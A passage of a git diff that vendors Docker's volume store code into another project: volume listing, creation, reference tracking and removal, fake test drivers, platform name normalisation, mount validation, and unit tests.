+	// globalLock is used to protect access to mutable structures used by the store object
+	globalLock sync.RWMutex
+	// names stores the volume name -> volume relationship.
+	// This is used for making lookups faster so we don't have to probe all drivers
+	names map[string]volume.Volume
+	// refs stores the volume name and the list of things referencing it
+	refs map[string][]string
+	// labels stores volume labels for each volume
+	labels map[string]map[string]string
+	// options stores volume options for each volume
+	options map[string]map[string]string
+	db      *bolt.DB
+}
+
+// List proxies to all registered volume drivers to get the full list of volumes
+// If a driver returns a volume that has name which conflicts with another volume from a different driver,
+// the first volume is chosen and the conflicting volume is dropped.
+func (s *VolumeStore) List() ([]volume.Volume, []string, error) {
+	vols, warnings, err := s.list()
+	if err != nil {
+		return nil, nil, &OpErr{Err: err, Op: "list"}
+	}
+	var out []volume.Volume
+
+	for _, v := range vols {
+		name := normaliseVolumeName(v.Name())
+
+		s.locks.Lock(name)
+		storedV, exists := s.getNamed(name)
+		// Note: it's not safe to populate the cache here because the volume may have been
+		// deleted before we acquire a lock on its name
+		if exists && storedV.DriverName() != v.DriverName() {
+			logrus.Warnf("Volume name %s already exists for driver %s, not including volume returned by %s", v.Name(), storedV.DriverName(), v.DriverName())
+			s.locks.Unlock(v.Name())
+			continue
+		}
+
+		out = append(out, v)
+		s.locks.Unlock(v.Name())
+	}
+	return out, warnings, nil
+}
+
+// list goes through each volume driver and asks for its list of volumes.
+func (s *VolumeStore) list() ([]volume.Volume, []string, error) {
+	var (
+		ls       []volume.Volume
+		warnings []string
+	)
+
+	drivers, err := volumedrivers.GetAllDrivers()
+	if err != nil {
+		return nil, nil, err
+	}
+
+	type vols struct {
+		vols       []volume.Volume
+		err        error
+		driverName string
+	}
+	chVols := make(chan vols, len(drivers))
+
+	for _, vd := range drivers {
+		go func(d volume.Driver) {
+			vs, err := d.List()
+			if err != nil {
+				chVols <- vols{driverName: d.Name(), err: &OpErr{Err: err, Name: d.Name(), Op: "list"}}
+				return
+			}
+			for i, v := range vs {
+				s.globalLock.RLock()
+				vs[i] = volumeWrapper{v, s.labels[v.Name()], d.Scope(), s.options[v.Name()]}
+				s.globalLock.RUnlock()
+			}
+
+			chVols <- vols{vols: vs}
+		}(vd)
+	}
+
+	badDrivers := make(map[string]struct{})
+	for i := 0; i < len(drivers); i++ {
+		vs := <-chVols
+
+		if vs.err != nil {
+			warnings = append(warnings, vs.err.Error())
+			badDrivers[vs.driverName] = struct{}{}
+			logrus.Warn(vs.err)
+		}
+		ls = append(ls, vs.vols...)
+	}
+
+	if len(badDrivers) > 0 {
+		s.globalLock.RLock()
+		for _, v := range s.names {
+			if _, exists := badDrivers[v.DriverName()]; exists {
+				ls = append(ls, v)
+			}
+		}
+		s.globalLock.RUnlock()
+	}
+	return ls, warnings, nil
+}
+
+// CreateWithRef creates a volume with the given name and driver and stores the ref
+// This ensures there's no race between creating a volume and then storing a reference.
+func (s *VolumeStore) CreateWithRef(name, driverName, ref string, opts, labels map[string]string) (volume.Volume, error) {
+	name = normaliseVolumeName(name)
+	s.locks.Lock(name)
+	defer s.locks.Unlock(name)
+
+	v, err := s.create(name, driverName, opts, labels)
+	if err != nil {
+		return nil, &OpErr{Err: err, Name: name, Op: "create"}
+	}
+
+	s.setNamed(v, ref)
+	return v, nil
+}
+
+// Create creates a volume with the given name and driver.
+// This is just like CreateWithRef() except we don't store a reference while holding the lock.
+func (s *VolumeStore) Create(name, driverName string, opts, labels map[string]string) (volume.Volume, error) {
+	return s.CreateWithRef(name, driverName, "", opts, labels)
+}
+
+// checkConflict checks the local cache for name collisions with the passed in name,
+// for existing volumes with the same name but in a different driver.
+// This is used by `Create` as a best effort to prevent name collisions for volumes.
+// If a matching volume is found that is not a conflict that is returned so the caller
+// does not need to perform an additional lookup.
+// When no matching volume is found, both returns will be nil
+//
+// Note: This does not probe all the drivers for name collisions because v1 plugins
+// are very slow, particularly if the plugin is down, and cause other issues,
+// particularly around locking the store.
+// TODO(cpuguy83): With v2 plugins this shouldn't be a problem. Could also potentially
+// use a connect timeout for this kind of check to ensure we aren't blocking for a
+// long time.
+func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, error) {
+	// check the local cache
+	v, _ := s.getNamed(name)
+	if v == nil {
+		return nil, nil
+	}
+
+	vDriverName := v.DriverName()
+	var conflict bool
+	if driverName != "" {
+		// Retrieve canonical driver name to avoid inconsistencies (for example
+		// "plugin" vs. "plugin:latest")
+		vd, err := volumedrivers.GetDriver(driverName)
+		if err != nil {
+			return nil, err
+		}
+
+		if vDriverName != vd.Name() {
+			conflict = true
+		}
+	}
+
+	// let's check if the found volume ref
+	// is stale by checking with the driver if it still exists
+	exists, err := volumeExists(v)
+	if err != nil {
+		return nil, errors.Wrapf(errNameConflict, "found reference to volume '%s' in driver '%s', but got an error while checking the driver: %v", name, vDriverName, err)
+	}
+
+	if exists {
+		if conflict {
+			return nil, errors.Wrapf(errNameConflict, "driver '%s' already has volume '%s'", vDriverName, name)
+		}
+		return v, nil
+	}
+
+	if len(s.getRefs(v.Name())) > 0 {
+		// Containers are referencing this volume but it doesn't seem to exist anywhere.
+		// Return a conflict error here, the user can fix this with `docker volume rm -f`
+		return nil, errors.Wrapf(errNameConflict, "found references to volume '%s' in driver '%s' but the volume was not found in the driver -- you may need to remove containers referencing this volume or force remove the volume to re-create it", name, vDriverName)
+	}
+
+	// doesn't exist, so purge it from the cache
+	s.Purge(name)
+	return nil, nil
+}
+
+// volumeExists returns if the volume is still present in the driver.
+// An error is returned if there was an issue communicating with the driver.
+func volumeExists(v volume.Volume) (bool, error) {
+	exists, err := lookupVolume(v.DriverName(), v.Name())
+	if err != nil {
+		return false, err
+	}
+	return exists != nil, nil
+}
+
+// create asks the given driver to create a volume with the name/opts.
+// If a volume with the name is already known, it will ask the stored driver for the volume.
+// If the passed in driver name does not match the driver name which is stored
+//  for the given volume name, an error is returned after checking if the reference is stale.
+// If the reference is stale, it will be purged and this create can continue.
+// It is expected that callers of this function hold any necessary locks.
+func (s *VolumeStore) create(name, driverName string, opts, labels map[string]string) (volume.Volume, error) {
+	// Validate the name in a platform-specific manner
+	valid, err := volume.IsVolumeNameValid(name)
+	if err != nil {
+		return nil, err
+	}
+	if !valid {
+		return nil, &OpErr{Err: errInvalidName, Name: name, Op: "create"}
+	}
+
+	v, err := s.checkConflict(name, driverName)
+	if err != nil {
+		return nil, err
+	}
+
+	if v != nil {
+		return v, nil
+	}
+
+	// Since there isn't a specified driver name, let's see if any of the existing drivers have this volume name
+	if driverName == "" {
+		v, _ := s.getVolume(name)
+		if v != nil {
+			return v, nil
+		}
+	}
+
+	vd, err := volumedrivers.CreateDriver(driverName)
+
+	if err != nil {
+		return nil, &OpErr{Op: "create", Name: name, Err: err}
+	}
+
+	logrus.Debugf("Registering new volume reference: driver %q, name %q", vd.Name(), name)
+
+	if v, _ := vd.Get(name); v != nil {
+		return v, nil
+	}
+	v, err = vd.Create(name, opts)
+	if err != nil {
+		return nil, err
+	}
+	s.globalLock.Lock()
+	s.labels[name] = labels
+	s.options[name] = opts
+	s.globalLock.Unlock()
+
+	metadata := volumeMetadata{
+		Name:    name,
+		Driver:  vd.Name(),
+		Labels:  labels,
+		Options: opts,
+	}
+
+	if err := s.setMeta(name, metadata); err != nil {
+		return nil, err
+	}
+	return volumeWrapper{v, labels, vd.Scope(), opts}, nil
+}
+
+// GetWithRef gets a volume with the given name from the passed in driver and stores the ref
+// This is just like Get(), but we store the reference while holding the lock.
+// This makes sure there are no races between checking for the existence of a volume and adding a reference for it
+func (s *VolumeStore) GetWithRef(name, driverName, ref string) (volume.Volume, error) {
+	name = normaliseVolumeName(name)
+	s.locks.Lock(name)
+	defer s.locks.Unlock(name)
+
+	vd, err := volumedrivers.GetDriver(driverName)
+	if err != nil {
+		return nil, &OpErr{Err: err, Name: name, Op: "get"}
+	}
+
+	v, err := vd.Get(name)
+	if err != nil {
+		return nil, &OpErr{Err: err, Name: name, Op: "get"}
+	}
+
+	s.setNamed(v, ref)
+
+	s.globalLock.RLock()
+	defer s.globalLock.RUnlock()
+	return volumeWrapper{v, s.labels[name], vd.Scope(), s.options[name]}, nil
+}
+
+// Get looks if a volume with the given name exists and returns it if so
+func (s *VolumeStore) Get(name string) (volume.Volume, error) {
+	name = normaliseVolumeName(name)
+	s.locks.Lock(name)
+	defer s.locks.Unlock(name)
+
+	v, err := s.getVolume(name)
+	if err != nil {
+		return nil, &OpErr{Err: err, Name: name, Op: "get"}
+	}
+	s.setNamed(v, "")
+	return v, nil
+}
+
+// getVolume requests the volume, if the driver info is stored it just accesses that driver,
+// if the driver is unknown it probes all drivers until it finds the first volume with that name.
+// it is expected that callers of this function hold any necessary locks
+func (s *VolumeStore) getVolume(name string) (volume.Volume, error) {
+	var meta volumeMetadata
+	meta, err := s.getMeta(name)
+	if err != nil {
+		return nil, err
+	}
+
+	driverName := meta.Driver
+	if driverName == "" {
+		s.globalLock.RLock()
+		v, exists := s.names[name]
+		s.globalLock.RUnlock()
+		if exists {
+			meta.Driver = v.DriverName()
+			if err := s.setMeta(name, meta); err != nil {
+				return nil, err
+			}
+		}
+	}
+
+	if meta.Driver != "" {
+		vol, err := lookupVolume(meta.Driver, name)
+		if err != nil {
+			return nil, err
+		}
+		if vol == nil {
+			s.Purge(name)
+			return nil, errNoSuchVolume
+		}
+
+		var scope string
+		vd, err := volumedrivers.GetDriver(meta.Driver)
+		if err == nil {
+			scope = vd.Scope()
+		}
+		return volumeWrapper{vol, meta.Labels, scope, meta.Options}, nil
+	}
+
+	logrus.Debugf("Probing all drivers for volume with name: %s", name)
+	drivers, err := volumedrivers.GetAllDrivers()
+	if err != nil {
+		return nil, err
+	}
+
+	for _, d := range drivers {
+		v, err := d.Get(name)
+		if err != nil || v == nil {
+			continue
+		}
+		meta.Driver = v.DriverName()
+		if err := s.setMeta(name, meta); err != nil {
+			return nil, err
+		}
+		return volumeWrapper{v, meta.Labels, d.Scope(), meta.Options}, nil
+	}
+	return nil, errNoSuchVolume
+}
+
+// lookupVolume gets the specified volume from the specified driver.
+// This will only return errors related to communications with the driver.
+// If the driver returns an error that is not communication related the
+//   error is logged but not returned.
+// If the volume is not found it will return `nil, nil``
+func lookupVolume(driverName, volumeName string) (volume.Volume, error) {
+	vd, err := volumedrivers.GetDriver(driverName)
+	if err != nil {
+		return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", volumeName, driverName)
+	}
+	v, err := vd.Get(volumeName)
+	if err != nil {
+		err = errors.Cause(err)
+		if _, ok := err.(net.Error); ok {
+			return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", v.Name(), v.DriverName())
+		}
+
+		// At this point, the error could be anything from the driver, such as "no such volume"
+		// Let's not check an error here, and instead check if the driver returned a volume
+		logrus.WithError(err).WithField("driver", driverName).WithField("volume", volumeName).Warnf("Error while looking up volume")
+	}
+	return v, nil
+}
+
+// Remove removes the requested volume. A volume is not removed if it has any refs
+func (s *VolumeStore) Remove(v volume.Volume) error {
+	name := normaliseVolumeName(v.Name())
+	s.locks.Lock(name)
+	defer s.locks.Unlock(name)
+
+	refs := s.getRefs(name)
+	if len(refs) > 0 {
+		return &OpErr{Err: errVolumeInUse, Name: v.Name(), Op: "remove", Refs: refs}
+	}
+
+	vd, err := volumedrivers.GetDriver(v.DriverName())
+	if err != nil {
+		return &OpErr{Err: err, Name: vd.Name(), Op: "remove"}
+	}
+
+	logrus.Debugf("Removing volume reference: driver %s, name %s", v.DriverName(), name)
+	vol := unwrapVolume(v)
+	if err := vd.Remove(vol); err != nil {
+		return &OpErr{Err: err, Name: name, Op: "remove"}
+	}
+
+	s.Purge(name)
+	return nil
+}
+
+// Dereference removes the specified reference to the volume
+func (s *VolumeStore) Dereference(v volume.Volume, ref string) {
+	s.locks.Lock(v.Name())
+	defer s.locks.Unlock(v.Name())
+
+	s.globalLock.Lock()
+	defer s.globalLock.Unlock()
+	var refs []string
+
+	for _, r := range s.refs[v.Name()] {
+		if r != ref {
+			refs = append(refs, r)
+		}
+	}
+	s.refs[v.Name()] = refs
+}
+
+// Refs gets the current list of refs for the given volume
+func (s *VolumeStore) Refs(v volume.Volume) []string {
+	s.locks.Lock(v.Name())
+	defer s.locks.Unlock(v.Name())
+
+	refs := s.getRefs(v.Name())
+	refsOut := make([]string, len(refs))
+	copy(refsOut, refs)
+	return refsOut
+}
+
+// FilterByDriver returns the available volumes filtered by driver name
+func (s *VolumeStore) FilterByDriver(name string) ([]volume.Volume, error) {
+	vd, err := volumedrivers.GetDriver(name)
+	if err != nil {
+		return nil, &OpErr{Err: err, Name: name, Op: "list"}
+	}
+	ls, err := vd.List()
+	if err != nil {
+		return nil, &OpErr{Err: err, Name: name, Op: "list"}
+	}
+	for i, v := range ls {
+		options := map[string]string{}
+		s.globalLock.RLock()
+		for key, value := range s.options[v.Name()] {
+			options[key] = value
+		}
+		ls[i] = volumeWrapper{v, s.labels[v.Name()], vd.Scope(), options}
+		s.globalLock.RUnlock()
+	}
+	return ls, nil
+}
+
+// FilterByUsed returns the available volumes filtered by if they are in use or not.
+// `used=true` returns only volumes that are being used, while `used=false` returns
+// only volumes that are not being used.
+func (s *VolumeStore) FilterByUsed(vols []volume.Volume, used bool) []volume.Volume {
+	return s.filter(vols, func(v volume.Volume) bool {
+		s.locks.Lock(v.Name())
+		l := len(s.getRefs(v.Name()))
+		s.locks.Unlock(v.Name())
+		if (used && l > 0) || (!used && l == 0) {
+			return true
+		}
+		return false
+	})
+}
+
+// filterFunc defines a function to allow filter volumes in the store
+type filterFunc func(vol volume.Volume) bool
+
+// filter returns the available volumes filtered by a filterFunc function
+func (s *VolumeStore) filter(vols []volume.Volume, f filterFunc) []volume.Volume {
+	var ls []volume.Volume
+	for _, v := range vols {
+		if f(v) {
+			ls = append(ls, v)
+		}
+	}
+	return ls
+}
+
+func unwrapVolume(v volume.Volume) volume.Volume {
+	if vol, ok := v.(volumeWrapper); ok {
+		return vol.Volume
+	}
+
+	return v
+}
+
+// Shutdown releases all resources used by the volume store
+// It does not make any changes to volumes, drivers, etc.
+func (s *VolumeStore) Shutdown() error {
+	return s.db.Close()
+}
diff --git a/vendor/github.com/docker/docker/volume/store/store_test.go b/vendor/github.com/docker/docker/volume/store/store_test.go
new file mode 100644
index 0000000000..b52f720ca1
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/store/store_test.go
@@ -0,0 +1,234 @@
+package store
+
+import (
+	"errors"
+	"io/ioutil"
+	"os"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/volume/drivers"
+	volumetestutils "github.com/docker/docker/volume/testutils"
+)
+
+func TestCreate(t *testing.T) {
+	volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
+	defer volumedrivers.Unregister("fake")
+	dir, err := ioutil.TempDir("", "test-create")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(dir)
+
+	s, err := New(dir)
+	if err != nil {
+		t.Fatal(err)
+	}
+	v, err := s.Create("fake1", "fake", nil, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if v.Name() != "fake1" {
+		t.Fatalf("Expected fake1 volume, got %v", v)
+	}
+	if l, _, _ := s.List(); len(l) != 1 {
+		t.Fatalf("Expected 1 volume in the store, got %v: %v", len(l), l)
+	}
+
+	if _, err := s.Create("none", "none", nil, nil); err == nil {
+		t.Fatalf("Expected unknown driver error, got nil")
+	}
+
+	_, err = s.Create("fakeerror", "fake", map[string]string{"error": "create error"}, nil)
+	expected := &OpErr{Op: "create", Name: "fakeerror", Err: errors.New("create error")}
+	if err != nil && err.Error() != expected.Error() {
+		t.Fatalf("Expected create fakeError: create error, got %v", err)
+	}
+}
+
+func TestRemove(t *testing.T) {
+	volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
+	volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop")
+	defer volumedrivers.Unregister("fake")
+	defer volumedrivers.Unregister("noop")
+	dir, err := ioutil.TempDir("", "test-remove")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(dir)
+	s, err := New(dir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// doing string compare here since this error comes directly from the driver
+	expected := "no such volume"
+	if err := s.Remove(volumetestutils.NoopVolume{}); err == nil || !strings.Contains(err.Error(), expected) {
+		t.Fatalf("Expected error %q, got %v", expected, err)
+	}
+
+	v, err := s.CreateWithRef("fake1", "fake", "fake", nil, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := s.Remove(v); !IsInUse(err) {
+		t.Fatalf("Expected ErrVolumeInUse error, got %v", err)
+	}
+	s.Dereference(v, "fake")
+	if err := s.Remove(v); err != nil {
+		t.Fatal(err)
+	}
+	if l, _, _ := s.List(); len(l) != 0 {
+		t.Fatalf("Expected 0 volumes in the store, got %v, %v", len(l), l)
+	}
+}
+
+func TestList(t *testing.T) {
+	volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
+	volumedrivers.Register(volumetestutils.NewFakeDriver("fake2"), "fake2")
+	defer volumedrivers.Unregister("fake")
+	defer volumedrivers.Unregister("fake2")
+	dir, err := ioutil.TempDir("", "test-list")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(dir)
+
+	s, err := New(dir)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := s.Create("test", "fake", nil, nil); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := s.Create("test2", "fake2", nil, nil); err != nil {
+		t.Fatal(err)
+	}
+
+	ls, _, err := s.List()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(ls) != 2 {
+		t.Fatalf("expected 2 volumes, got: %d", len(ls))
+	}
+	if err := s.Shutdown(); err != nil {
+		t.Fatal(err)
+	}
+
+	// and again with a new store
+	s, err = New(dir)
+	if err != nil {
+		t.Fatal(err)
+	}
+	ls, _, err = s.List()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(ls) != 2 {
+		t.Fatalf("expected 2 volumes, got: %d", len(ls))
+	}
+}
+
+func TestFilterByDriver(t *testing.T) {
+	volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
+	volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop")
+	defer volumedrivers.Unregister("fake")
+	defer volumedrivers.Unregister("noop")
+	dir, err := ioutil.TempDir("", "test-filter-driver")
+	if err != nil {
+		t.Fatal(err)
+	}
+	s, err := New(dir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := s.Create("fake1", "fake", nil, nil); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := s.Create("fake2", "fake", nil, nil); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := s.Create("fake3", "noop", nil, nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if l, _ := s.FilterByDriver("fake"); len(l) != 2 {
+		t.Fatalf("Expected 2 volumes, got %v, %v", len(l), l)
+	}
+
+	if l, _ := s.FilterByDriver("noop"); len(l) != 1 {
+		t.Fatalf("Expected 1 volume, got %v, %v", len(l), l)
+	}
+}
+
+func TestFilterByUsed(t *testing.T) {
+	volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
+	volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop")
+	dir, err := ioutil.TempDir("", "test-filter-used")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	s, err := New(dir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := s.CreateWithRef("fake1", "fake", "volReference", nil, nil); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := s.Create("fake2", "fake", nil, nil); err != nil {
+		t.Fatal(err)
+	}
+
+	vols, _, err := s.List()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	dangling := s.FilterByUsed(vols, false)
+	if len(dangling) != 1 {
+		t.Fatalf("expected 1 danging volume, got %v", len(dangling))
+	}
+	if dangling[0].Name() != "fake2" {
+		t.Fatalf("expected danging volume fake2, got %s", dangling[0].Name())
+	}
+
+	used := s.FilterByUsed(vols, true)
+	if len(used) != 1 {
+		t.Fatalf("expected 1 used volume, got %v", len(used))
+	}
+	if used[0].Name() != "fake1" {
+		t.Fatalf("expected used volume fake1, got %s", used[0].Name())
+	}
+}
+
+func TestDerefMultipleOfSameRef(t *testing.T) {
+	volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
+	dir, err := ioutil.TempDir("", "test-same-deref")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	s, err := New(dir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	v, err := s.CreateWithRef("fake1", "fake", "volReference", nil, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := s.GetWithRef("fake1", "fake", "volReference"); err != nil {
+		t.Fatal(err)
+	}
+
+	s.Dereference(v, "volReference")
+	if err := s.Remove(v); err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/volume/store/store_unix.go b/vendor/github.com/docker/docker/volume/store/store_unix.go
new file mode 100644
index 0000000000..8ebc1f20c7
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/store/store_unix.go
@@ -0,0 +1,9 @@
+// +build linux freebsd solaris
+
+package store
+
+// normaliseVolumeName is a platform specific function to normalise the name
+// of a volume. This is a no-op on Unix-like platforms
+func normaliseVolumeName(name string) string {
+	return name
+}
diff --git a/vendor/github.com/docker/docker/volume/store/store_windows.go b/vendor/github.com/docker/docker/volume/store/store_windows.go
new file mode 100644
index 0000000000..8601cdd5cf
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/store/store_windows.go
@@ -0,0 +1,12 @@
+package store
+
+import "strings"
+
+// normaliseVolumeName is a platform specific function to normalise the name
+// of a volume. On Windows, as NTFS is case insensitive, under
+// c:\ProgramData\Docker\Volumes\, the folders John and john would be synonymous.
+// Hence we can't allow the volume "John" and "john" to be created as separate
+// volumes.
+func normaliseVolumeName(name string) string {
+	return strings.ToLower(name)
+}
diff --git a/vendor/github.com/docker/docker/volume/testutils/testutils.go b/vendor/github.com/docker/docker/volume/testutils/testutils.go
new file mode 100644
index 0000000000..2dbac02fdb
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/testutils/testutils.go
@@ -0,0 +1,116 @@
+package testutils
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/volume"
+)
+
+// NoopVolume is a volume that doesn't perform any operation
+type NoopVolume struct{}
+
+// Name is the name of the volume
+func (NoopVolume) Name() string { return "noop" }
+
+// DriverName is the name of the driver
+func (NoopVolume) DriverName() string { return "noop" }
+
+// Path is the filesystem path to the volume
+func (NoopVolume) Path() string { return "noop" }
+
+// Mount mounts the volume in the container
+func (NoopVolume) Mount(_ string) (string, error) { return "noop", nil }
+
+// Unmount unmounts the volume from the container
+func (NoopVolume) Unmount(_ string) error { return nil }
+
+// Status proivdes low-level details about the volume
+func (NoopVolume) Status() map[string]interface{} { return nil }
+
+// FakeVolume is a fake volume with a random name
+type FakeVolume struct {
+	name       string
+	driverName string
+}
+
+// NewFakeVolume creates a new fake volume for testing
+func NewFakeVolume(name string, driverName string) volume.Volume {
+	return FakeVolume{name: name, driverName: driverName}
+}
+
+// Name is the name of the volume
+func (f FakeVolume) Name() string { return f.name }
+
+// DriverName is the name of the driver
+func (f FakeVolume) DriverName() string { return f.driverName }
+
+// Path is the filesystem path to the volume
+func (FakeVolume) Path() string { return "fake" }
+
+// Mount mounts the volume in the container
+func (FakeVolume) Mount(_ string) (string, error) { return "fake", nil }
+
+// Unmount unmounts the volume from the container
+func (FakeVolume) Unmount(_ string) error { return nil }
+
+// Status proivdes low-level details about the volume
+func (FakeVolume) Status() map[string]interface{} { return nil }
+
+// FakeDriver is a driver that generates fake volumes
+type FakeDriver struct {
+	name string
+	vols map[string]volume.Volume
+}
+
+// NewFakeDriver creates a new FakeDriver with the specified name
+func NewFakeDriver(name string) volume.Driver {
+	return &FakeDriver{
+		name: name,
+		vols: make(map[string]volume.Volume),
+	}
+}
+
+// Name is the name of the driver
+func (d *FakeDriver) Name() string { return d.name }
+
+// Create initializes a fake volume.
+// It returns an error if the options include an "error" key with a message
+func (d *FakeDriver) Create(name string, opts map[string]string) (volume.Volume, error) {
+	if opts != nil && opts["error"] != "" {
+		return nil, fmt.Errorf(opts["error"])
+	}
+	v := NewFakeVolume(name, d.name)
+	d.vols[name] = v
+	return v, nil
+}
+
+// Remove deletes a volume.
+func (d *FakeDriver) Remove(v volume.Volume) error {
+	if _, exists := d.vols[v.Name()]; !exists {
+		return fmt.Errorf("no such volume")
+	}
+	delete(d.vols, v.Name())
+	return nil
+}
+
+// List lists the volumes
+func (d *FakeDriver) List() ([]volume.Volume, error) {
+	var vols []volume.Volume
+	for _, v := range d.vols {
+		vols = append(vols, v)
+	}
+	return vols, nil
+}
+
+// Get gets the volume
+func (d *FakeDriver) Get(name string) (volume.Volume, error) {
+	if v, exists := d.vols[name]; exists {
+		return v, nil
+	}
+	return nil, fmt.Errorf("no such volume")
+}
+
+// Scope returns the local scope
+func (*FakeDriver) Scope() string {
+	return "local"
+}
diff --git a/vendor/github.com/docker/docker/volume/validate.go b/vendor/github.com/docker/docker/volume/validate.go
new file mode 100644
index 0000000000..27a8c5d5b0
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/validate.go
@@ -0,0 +1,125 @@
+package volume
+
+import (
+	"errors"
+	"fmt"
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/api/types/mount"
+)
+
+var errBindNotExist = errors.New("bind source path does not exist")
+
+type validateOpts struct {
+	skipBindSourceCheck   bool
+	skipAbsolutePathCheck bool
+}
+
+func validateMountConfig(mnt *mount.Mount, options ...func(*validateOpts)) error {
+	opts := validateOpts{}
+	for _, o := range options {
+		o(&opts)
+	}
+
+	if len(mnt.Target) == 0 {
+		return &errMountConfig{mnt, errMissingField("Target")}
+	}
+
+	if err := validateNotRoot(mnt.Target); err != nil {
+		return &errMountConfig{mnt, err}
+	}
+
+	if !opts.skipAbsolutePathCheck {
+		if err := validateAbsolute(mnt.Target); err != nil {
+			return &errMountConfig{mnt, err}
+		}
+	}
+
+	switch mnt.Type {
+	case mount.TypeBind:
+		if len(mnt.Source) == 0 {
+			return &errMountConfig{mnt, errMissingField("Source")}
+		}
+		// Don't error out just because the propagation mode is not supported on the platform
+		if opts := mnt.BindOptions; opts != nil {
+			if len(opts.Propagation) > 0 && len(propagationModes) > 0 {
+				if _, ok := propagationModes[opts.Propagation]; !ok {
+					return &errMountConfig{mnt, fmt.Errorf("invalid propagation mode: %s", opts.Propagation)}
+				}
+			}
+		}
+		if mnt.VolumeOptions != nil {
+			return &errMountConfig{mnt, errExtraField("VolumeOptions")}
+		}
+
+		if err := validateAbsolute(mnt.Source); err != nil {
+			return &errMountConfig{mnt, err}
+		}
+
+		// Do not allow binding to non-existent path
+		if !opts.skipBindSourceCheck {
+			fi, err := os.Stat(mnt.Source)
+			if err != nil {
+				if !os.IsNotExist(err) {
+					return &errMountConfig{mnt, err}
+				}
+				return &errMountConfig{mnt, errBindNotExist}
+			}
+			if err := validateStat(fi); err != nil {
+				return &errMountConfig{mnt, err}
+			}
+		}
+	case mount.TypeVolume:
+		if mnt.BindOptions != nil {
+			return &errMountConfig{mnt, errExtraField("BindOptions")}
+		}
+
+		if len(mnt.Source) == 0 && mnt.ReadOnly {
+			return &errMountConfig{mnt, fmt.Errorf("must not set ReadOnly mode when using anonymous volumes")}
+		}
+
+		if len(mnt.Source) != 0 {
+			if valid, err := IsVolumeNameValid(mnt.Source); !valid {
+				if err == nil {
+					err = errors.New("invalid volume name")
+				}
+				return &errMountConfig{mnt, err}
+			}
+		}
+	case mount.TypeTmpfs:
+		if len(mnt.Source) != 0 {
+			return &errMountConfig{mnt, errExtraField("Source")}
+		}
+		if _, err := ConvertTmpfsOptions(mnt.TmpfsOptions, mnt.ReadOnly); err != nil {
+			return &errMountConfig{mnt, err}
+		}
+	default:
+		return &errMountConfig{mnt, errors.New("mount type unknown")}
+	}
+	return nil
+}
+
+type errMountConfig struct {
+	mount *mount.Mount
+	err   error
+}
+
+func (e *errMountConfig) Error() string {
+	return fmt.Sprintf("invalid mount config for type %q: %v", e.mount.Type, e.err.Error())
+}
+
+func errExtraField(name string) error {
+	return fmt.Errorf("field %s must not be specified", name)
+}
+func errMissingField(name string) error {
+	return fmt.Errorf("field %s must not be empty", name)
+}
+
+func validateAbsolute(p string) error {
+	p = convertSlash(p)
+	if filepath.IsAbs(p) {
+		return nil
+	}
+	return fmt.Errorf("invalid mount path: '%s' mount path must be absolute", p)
+}
diff --git a/vendor/github.com/docker/docker/volume/validate_test.go b/vendor/github.com/docker/docker/volume/validate_test.go
new file mode 100644
index 0000000000..8732500fc0
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/validate_test.go
@@ -0,0 +1,43 @@
+package volume
+
+import (
+	"errors"
+	"io/ioutil"
+	"os"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/mount"
+)
+
+func TestValidateMount(t *testing.T) {
+	testDir, err := ioutil.TempDir("", "test-validate-mount")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(testDir)
+
+	cases := []struct {
+		input    mount.Mount
+		expected error
+	}{
+		{mount.Mount{Type: mount.TypeVolume}, errMissingField("Target")},
+		{mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath, Source: "hello"}, nil},
+		{mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, nil},
+		{mount.Mount{Type: mount.TypeBind}, errMissingField("Target")},
+		{mount.Mount{Type: mount.TypeBind, Target: testDestinationPath}, errMissingField("Source")},
